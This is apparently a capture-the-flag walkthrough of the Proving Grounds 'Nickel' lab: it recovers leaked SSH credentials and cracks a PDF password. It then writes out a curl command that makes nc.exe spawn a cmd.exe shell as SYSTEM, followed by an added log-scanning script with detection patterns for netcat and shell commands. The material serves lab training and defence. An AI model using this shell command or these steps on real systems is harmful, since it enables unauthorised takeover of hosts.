Proving Grounds Practice — Nickel

gizembozyel
Aug 21, 2023

Hello, today I’ll walk through the solution to Proving Grounds Practice — Nickel.

First, we ran an Nmap scan.

When we examined the website on port 80, we saw the following page.

When we examined the website on port 33333, we saw the following page.

When we examined the website on port 8089, we saw the following page.

When we examined the source of this page, we found links pointing to paths on port 33333 at a different IP address. We then tried to open these pages using our own IP address instead. We noticed that we could not reach the relevant list-running-procs path with a GET request.

When we sent the request again with a different HTTP method using Burp Suite, the response contained SSH login information. The password was base64-encoded, so we decoded it to obtain the plaintext.

Then, using these user credentials, we retrieved a PDF file over FTP. We cracked its password with the pdf2crack tool, and the PDF document gave us various pieces of information.

When we ran the whoami command through the command endpoint on port 80, we noticed that it runs as nt authority\system.

We transferred the netcat executable (nc.exe) over the SSH connection.

We opened two separate SSH sessions. In one, we started a netcat listener. In the other, we used curl to send a request to port 80 that runs nc.exe:

curl http://nickel/?cmd%20%2Fc%20C%3A%5CUsers%5Cariah%5Cnc.exe%20127.0.0.1%204444%20-e%20cmd.exe

Yes, we now have nt authority\system. We can get our proof.txt file.
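From the defender's side, the request above is easy to spot once the query string is URL-decoded. The following is an added example, not part of the original write-up: it scans web access-log lines for command execution passed in the query string. The log format, the rule names and the sample lines are constructed assumptions, not output from the lab machine.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample lines in a common access-log layout (assumption: the
# service on port 80 logs the request line; the lab's real logs may differ).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Aug/2023:10:00:01 +0000] "GET / HTTP/1.1" 200 512',
    '127.0.0.1 - - [21/Aug/2023:10:05:42 +0000] "GET /?cmd%20%2Fc%20C%3A%5CUsers%5Cariah%5Cnc.exe%20127.0.0.1%204444%20-e%20cmd.exe HTTP/1.1" 200 0',
    '192.0.2.10 - - [21/Aug/2023:10:06:10 +0000] "GET /?whoami HTTP/1.1" 200 21',
    '192.0.2.10 - - [21/Aug/2023:10:07:00 +0000] "GET /search?q=command%20line%20tips HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Hypothetical rule set: each pattern runs against the URL-decoded query string.
RULES = {
    "shell_interpreter": re.compile(r"\b(cmd(\.exe)?\s+/c|powershell(\.exe)?)\b", re.I),
    "netcat_exec": re.compile(r"\bnc(at)?(\.exe)?\b.*\s-e\s", re.I),
    "recon_command": re.compile(r"^(whoami|ipconfig|systeminfo|net\s+user)\b", re.I),
}


def scan_line(line):
    """Return (decoded_query, [matching rule names]), or None if unparseable."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    # Decode first: percent-encoding hides spaces, slashes and backslashes.
    query = unquote(urlsplit(m.group("target")).query)
    hits = [name for name, rx in RULES.items() if rx.search(query)]
    return query, hits


def scan(lines):
    """Return (line_number, rule_names, decoded_query) for every flagged line."""
    findings = []
    for n, line in enumerate(lines, 1):
        result = scan_line(line)
        if result and result[1]:
            findings.append((n, result[1], result[0]))
    return findings


if __name__ == "__main__":
    for n, rules, query in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(rules)} -> {query}")
```

A request that matches here while the handling process runs as nt authority\system means whoever can reach the endpoint has full control of the host, so the endpoint itself should be removed or placed behind authentication and run under a low-privilege account.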

We find our flag and complete the challenge. Keep hacking!

Practice makes perfect :)
